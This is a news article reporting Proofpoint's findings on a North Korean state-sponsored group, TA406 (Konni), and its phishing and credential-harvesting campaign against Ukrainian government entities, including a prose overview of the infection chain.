North Korea’s involvement in the war in Ukraine extends beyond sending soldiers, munitions, and missiles to Russia, as cybersecurity researchers warn of recent cyberespionage campaigns against Ukrainian government entities by a known North Korean state-sponsored actor.
“Proofpoint assesses TA406 is targeting Ukrainian government entities to better understand the appetite to continue fighting against the Russian invasion and assess the medium-term outlook of the conflict,” researchers from cybersecurity firm Proofpoint wrote in a report this week.
TA406, also known in the security industry as Konni, Opal Sleet, and OSMIUM, has been active since at least 2014 and, ironically, has historically been tasked with targeting Russia, as well as South Korea. For example, in January 2022 Konni targeted Russian diplomats with phishing emails masquerading as New Year greetings.
In a new report that analyzes North Korea’s cyber capabilities, groups, and tradecraft, researchers from insider risk management firm DTEX Systems attribute Konni to the Reconnaissance General Bureau of the North Korean Army’s General Staff Department, along with APT43 and APT45. The group is known primarily for its custom Konni RAT that can capture keystrokes, take screenshots, and exfiltrate data.
Impersonating think tank analysts
The latest campaign against government targets in Ukraine began in February and involved emails from a fictitious person claiming to be a senior fellow with a think tank called the Royal Institute of Strategic Studies, an entity that doesn’t exist.
The email contained a link to what was supposed to be an analysis of the views of Ukrainian people and major politicians about the targeted political group. The link led to a password-protected RAR archive hosted on the Mega file hosting service. The password was included in the email.
In case the target didn’t click on the link, the attackers followed up on multiple days with additional emails asking the recipient if they read their previous emails, a tactic meant to put pressure on the victim.
The RAR archive contained a Microsoft Compiled HTML Help (CHM) file that included multiple poisoned HTML files with information about Valeriy Zaluzhnyi, the former commander-in-chief of the Ukrainian Armed Forces.
When opened and clicked, the HTML page downloads a PowerShell script that contains commands to gather information about the system. This information is then sent back to an attacker-controlled server.
The PowerShell script also saves the code from the HTML file to a file called state.bat that is copied to the system’s autorun folder to achieve persistence and execute after every reboot.
A variation of this attack included a ZIP attachment in the phishing email instead of a link. The ZIP archive contained a PDF and a LNK (Windows shortcut) file called “Why Zelenskyy fired Zaluzhnyi.” If opened, the LNK file executed PowerShell code that created a Windows scheduled task with the name Windows Themes Update.
The code also drops a JavaScript Encoded (JSE) file that gets executed by the new scheduled task. This file checks an attacker-controlled server for additional PowerShell code to execute.
Credential harvesting
Before the phishing emails, the same Ukrainian government entities were targeted with email alerts impersonating Microsoft and claiming unusual sign-in activity was detected on their accounts. The victims were asked to perform identity verification by clicking on a button, which took them to credential harvesting pages.
The Proofpoint researchers didn’t manage to obtain any of these pages for analysis, but the same domain had been flagged in the past for Naver credential harvesting which aligns with past TA406 activity.
“North Korea committed troops to assist Russia in the fall of 2024, and TA406 is very likely gathering intelligence to help North Korean leadership determine the current risk to its forces already in the theatre, as well as the likelihood that Russia will request more troops or armaments,” the Proofpoint researchers said.
See also:
The original article found on After helping Russia on the ground North Korea targets Ukraine with cyberespionage | CSO Online Read More
_Andrew_Angelov_Alamy.jpg)
